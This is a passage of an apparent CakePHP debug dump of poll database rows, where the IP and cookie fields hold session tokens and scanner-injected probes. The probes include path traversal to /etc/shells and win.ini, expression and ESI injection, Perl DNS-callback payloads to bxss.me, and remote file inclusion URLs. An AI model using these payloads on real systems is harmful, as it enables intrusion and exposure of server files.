'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1471 => array(
'id' => '2014',
'ip' => '45.84.137.43',
'ip1' => 'seYwd5YK',
'sondage_id' => '2'
),
(int) 1472 => array(
'id' => '2015',
'ip' => '45.84.137.43',
'ip1' => 'z6C1JNJY: aWyjcIXK',
'sondage_id' => '2'
),
(int) 1473 => array(
'id' => '2016',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1474 => array(
'id' => '2017',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1475 => array(
'id' => '2018',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1476 => array(
'id' => '2019',
'ip' => '45.84.137.43',
'ip1' => 'response.write(9217212*9110928)',
'sondage_id' => '2'
),
(int) 1477 => array(
'id' => '2020',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 1478 => array(
'id' => '2021',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1479 => array(
'id' => '2022',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1480 => array(
'id' => '2023',
'ip' => '${9999157+9999058}',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1481 => array(
'id' => '2024',
'ip' => '45.84.137.43',
'ip1' => '${9999724+9999596}',
'sondage_id' => '2'
),
(int) 1482 => array(
'id' => '2025',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1483 => array(
'id' => '2026',
'ip' => '45.84.137.43',
'ip1' => 'YWlBQjIzQUdHdXJnb3FjQ3JLVThCUXJXMjVHUGFpZGlSWHFRQXBtVQ==',
'sondage_id' => '2'
),
(int) 1484 => array(
'id' => '2027',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf&n955722=v960812',
'sondage_id' => '2'
),
(int) 1485 => array(
'id' => '2028',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1486 => array(
'id' => '2029',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1487 => array(
'id' => '2030',
'ip' => ')',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1488 => array(
'id' => '2031',
'ip' => '45.84.137.43',
'ip1' => ''+response.write(9217212*9110928)+'',
'sondage_id' => '2'
),
(int) 1489 => array(
'id' => '2032',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1490 => array(
'id' => '2033',
'ip' => '45.84.137.43',
'ip1' => '',
'sondage_id' => '2'
),
(int) 1491 => array(
'id' => '2034',
'ip' => '45.84.137.43',
'ip1' => '"+response.write(9217212*9110928)+"',
'sondage_id' => '2'
),
(int) 1492 => array(
'id' => '2035',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1493 => array(
'id' => '2036',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1494 => array(
'id' => '2037',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1495 => array(
'id' => '2038',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1496 => array(
'id' => '2039',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1497 => array(
'id' => '2040',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1498 => array(
'id' => '2041',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1499 => array(
'id' => '2042',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1500 => array(
'id' => '2043',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1501 => array(
'id' => '2044',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1502 => array(
'id' => '2045',
'ip' => '45.84.137.43',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 1503 => array(
'id' => '2046',
'ip' => '45.84.137.43',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 1504 => array(
'id' => '2047',
'ip' => '45.84.137.43',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 1505 => array(
'id' => '2048',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1506 => array(
'id' => '2049',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1507 => array(
'id' => '2050',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1508 => array(
'id' => '2051',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1509 => array(
'id' => '2052',
'ip' => '45.84.137.43',
'ip1' => ''.gethostbyname(lc('hitxo'.'iuyupfpw262e1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(118).chr(67).'',
'sondage_id' => '2'
),
(int) 1510 => array(
'id' => '2053',
'ip' => '45.84.137.43',
'ip1' => '".gethostbyname(lc("hitqo"."rkpgrtixc8b05.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(89).chr(114).chr(77)."',
'sondage_id' => '2'
),
(int) 1511 => array(
'id' => '2054',
'ip' => '45.84.137.43',
'ip1' => 'gethostbyname(lc('hitbg'.'zmkhyunx701a7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(66).chr(109).chr(66)',
'sondage_id' => '2'
),
(int) 1512 => array(
'id' => '2055',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1513 => array(
'id' => '2056',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1514 => array(
'id' => '2057',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1515 => array(
'id' => '2058',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1516 => array(
'id' => '2059',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1517 => array(
'id' => '2060',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1518 => array(
'id' => '2061',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1519 => array(
'id' => '2062',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1520 => array(
'id' => '2063',
'ip' => ''"()',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1521 => array(
'id' => '2064',
'ip' => '45.84.137.43',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 1522 => array(
'id' => '2065',
'ip' => '45.84.137.43',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 1523 => array(
'id' => '2066',
'ip' => '45.84.137.43',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 1524 => array(
'id' => '2067',
'ip' => '45.84.137.43',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 1525 => array(
'id' => '2068',
'ip' => '45.84.137.43',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 1526 => array(
'id' => '2069',
'ip' => '45.84.137.43',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 1527 => array(
'id' => '2070',
'ip' => '45.84.137.43',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 1528 => array(
'id' => '2071',
'ip' => '45.84.137.43',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 1529 => array(
'id' => '2072',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 1530 => array(
'id' => '2073',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1531 => array(
'id' => '2074',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1532 => array(
'id' => '2075',
'ip' => '194.34.233.95',
'ip1' => 'CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea; CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea',
'sondage_id' => '2'
),
(int) 1533 => array(
'id' => '2076',
'ip' => '194.34.233.95',
'ip1' => 'CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea; CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea',
'sondage_id' => '2'
),
(int) 1534 => array(
'id' => '2077',
'ip' => '194.34.233.95',
'ip1' => 'CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea; CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea',
'sondage_id' => '2'
),
(int) 1535 => array(
'id' => '2078',
'ip' => '194.34.233.95',
'ip1' => 'CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea; CAKEPHP=a57a00ec8aa522fa5fe8471b3dd706ea',
'sondage_id' => '2'
),
(int) 1536 => array(
'id' => '2079',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1537 => array(
'id' => '2080',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1538 => array(
'id' => '2081',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1539 => array(
'id' => '2082',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1540 => array(
'id' => '2083',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1541 => array(
'id' => '2084',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1542 => array(
'id' => '2085',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1543 => array(
'id' => '2086',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1544 => array(
'id' => '2087',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1545 => array(
'id' => '2088',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1546 => array(
'id' => '2089',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1547 => array(
'id' => '2090',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1548 => array(
'id' => '2091',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1549 => array(
'id' => '2092',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1550 => array(
'id' => '2093',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1551 => array(
'id' => '2094',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1552 => array(
'id' => '2095',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1553 => array(
'id' => '2096',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1554 => array(
'id' => '2097',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1555 => array(
'id' => '2098',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1556 => array(
'id' => '2099',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1557 => array(
'id' => '2100',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1558 => array(
'id' => '2101',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1559 => array(
'id' => '2102',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1560 => array(
'id' => '2103',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1561 => array(
'id' => '2104',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1562 => array(
'id' => '2105',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1563 => array(
'id' => '2106',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1564 => array(
'id' => '2107',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1565 => array(
'id' => '2108',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1566 => array(
'id' => '2109',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1567 => array(
'id' => '2110',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1568 => array(
'id' => '2111',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1569 => array(
'id' => '2112',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1570 => array(
'id' => '2113',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1571 => array(
'id' => '2114',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1572 => array(
'id' => '2115',
'ip' => '1qvb8CsQO',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1573 => array(
'id' => '2116',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1574 => array(
'id' => '2117',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1575 => array(
'id' => '2118',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1576 => array(
'id' => '2119',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1577 => array(
'id' => '2120',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1578 => array(
'id' => '2121',
'ip' => '194.34.233.95',
'ip1' => '1a3Ck6saO',
'sondage_id' => '2'
),
(int) 1579 => array(
'id' => '2122',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1580 => array(
'id' => '2123',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1581 => array(
'id' => '2124',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1582 => array(
'id' => '2125',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1583 => array(
'id' => '2126',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1584 => array(
'id' => '2127',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1585 => array(
'id' => '2128',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1586 => array(
'id' => '2129',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1587 => array(
'id' => '2130',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1588 => array(
'id' => '2131',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1589 => array(
'id' => '2132',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1590 => array(
'id' => '2133',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1591 => array(
'id' => '2134',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1592 => array(
'id' => '2135',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1593 => array(
'id' => '2136',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1594 => array(
'id' => '2137',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1595 => array(
'id' => '2138',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1596 => array(
'id' => '2139',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1597 => array(
'id' => '2140',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1598 => array(
'id' => '2141',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1599 => array(
'id' => '2142',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1600 => array(
'id' => '2143',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1601 => array(
'id' => '2144',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1602 => array(
'id' => '2145',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1603 => array(
'id' => '2146',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1604 => array(
'id' => '2147',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1605 => array(
'id' => '2148',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1606 => array(
'id' => '2149',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1607 => array(
'id' => '2150',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1608 => array(
'id' => '2151',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1609 => array(
'id' => '2152',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1610 => array(
'id' => '2153',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1611 => array(
'id' => '2154',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1612 => array(
'id' => '2155',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1613 => array(
'id' => '2156',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1614 => array(
'id' => '2157',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1615 => array(
'id' => '2158',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1616 => array(
'id' => '2159',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1617 => array(
'id' => '2160',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1618 => array(
'id' => '2161',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1619 => array(
'id' => '2162',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1620 => array(
'id' => '2163',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1621 => array(
'id' => '2164',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1622 => array(
'id' => '2165',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1623 => array(
'id' => '2166',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1624 => array(
'id' => '2167',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1625 => array(
'id' => '2168',
'ip' => 'AN2FZ7wH',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1626 => array(
'id' => '2169',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1627 => array(
'id' => '2170',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1628 => array(
'id' => '2171',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1629 => array(
'id' => '2172',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1630 => array(
'id' => '2173',
'ip' => 'K1xP7XQZ: wP3N8wGt',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1631 => array(
'id' => '2174',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1632 => array(
'id' => '2175',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1633 => array(
'id' => '2176',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1634 => array(
'id' => '2177',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1635 => array(
'id' => '2178',
'ip' => '194.34.233.95',
'ip1' => 'VVan7uL3',
'sondage_id' => '2'
),
(int) 1636 => array(
'id' => '2179',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1637 => array(
'id' => '2180',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1638 => array(
'id' => '2181',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1639 => array(
'id' => '2182',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1640 => array(
'id' => '2183',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1641 => array(
'id' => '2184',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1642 => array(
'id' => '2185',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1643 => array(
'id' => '2186',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1644 => array(
'id' => '2187',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1645 => array(
'id' => '2188',
'ip' => '194.34.233.95',
'ip1' => 'jf2YOCQI: ACUXj1yQ',
'sondage_id' => '2'
),
(int) 1646 => array(
'id' => '2189',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1647 => array(
'id' => '2190',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1648 => array(
'id' => '2191',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1649 => array(
'id' => '2192',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1650 => array(
'id' => '2193',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1651 => array(
'id' => '2194',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1652 => array(
'id' => '2195',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1653 => array(
'id' => '2196',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1654 => array(
'id' => '2197',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1655 => array(
'id' => '2198',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1656 => array(
'id' => '2199',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1657 => array(
'id' => '2200',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1658 => array(
'id' => '2201',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1659 => array(
'id' => '2202',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1660 => array(
'id' => '2203',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1661 => array(
'id' => '2204',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1662 => array(
'id' => '2205',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1663 => array(
'id' => '2206',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1664 => array(
'id' => '2207',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1665 => array(
'id' => '2208',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1666 => array(
'id' => '2209',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1667 => array(
'id' => '2210',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1668 => array(
'id' => '2211',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1669 => array(
'id' => '2212',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1670 => array(
'id' => '2213',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1671 => array(
'id' => '2214',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1672 => array(
'id' => '2215',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1673 => array(
'id' => '2216',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1674 => array(
'id' => '2217',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1675 => array(
'id' => '2218',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1676 => array(
'id' => '2219',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1677 => array(
'id' => '2220',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1678 => array(
'id' => '2221',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1679 => array(
'id' => '2222',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1680 => array(
'id' => '2223',
'ip' => '194.34.233.95',
